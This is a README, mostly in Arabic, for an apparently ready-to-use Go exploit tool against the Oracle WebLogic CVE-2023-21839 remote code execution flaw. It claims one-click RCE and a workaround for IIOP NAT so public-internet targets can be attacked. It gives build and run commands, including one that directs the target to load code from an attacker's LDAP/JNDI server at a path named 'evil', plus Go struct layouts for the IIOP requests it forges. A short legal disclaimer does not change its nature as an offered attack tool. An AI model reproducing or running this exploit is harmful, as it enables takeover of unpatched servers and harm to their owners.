
Weblogic CVE-2023-21839 RCE (بدون اعتماد على Java، RCE بنقرة واحدة)
استخدام هذا المشروع لمهاجمة أو اختبار أهداف دون إذن هو غير قانوني. يجب استخدام هذا البرنامج فقط لأغراض الاختبار الأمني والبحث المصرح به
Weblogic CVE-2023-21839 RCE
(١) لا يتطلب أي تبعيات جافا، ينشئ البروتوكول عبر socket لتنفيذ RCE مباشر
(٢) حل مشكلات شبكة NAT الخاصة بـ IIOP (يمكن اختبار Docker وأهداف الشبكة العامة)
(٣) تم اختباره على Windows/Mac OS/Linux و Weblogic 12/14
(٤) يُرجى استخدام JDK 8u191 أو أقل لتشغيل Weblogic وإعداد خادم JNDI الخاص بك
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Locate Request
type LocateRequest struct {
Header *Header
RequestId []byte // 4
TargetAddress []byte // 2
_reserved []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
}
Resolve Request
type ResolveRequest struct {
Header *Header
RequestId []byte // 4
ResponseFlags []byte // 1
_reserved1 []byte // 3
TargetAddress []byte // 2
_reserved2 []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
_operationLength []byte // 4
RequestOperation []byte // _operationLength
_reserved3 []byte // 1
ServiceContextList *ServiceContextList
CosNamingDissector []byte // no limit
}
Rebind Request
type RebindRequest struct {
Header *Header
RequestId []byte // 4
ResponseFlags []byte // 1
_reserved1 []byte // 3
TargetAddress []byte // 2
_reserved2 []byte // 2
_keyAddressLength []byte // 4
KeyAddress []byte // _keyAddressLength
_operationLength []byte // 4
RequestOperation []byte // _operationLength
_reserved3 []byte // 2
ServiceContextList *ServiceContextList
StubData []byte // no limit
}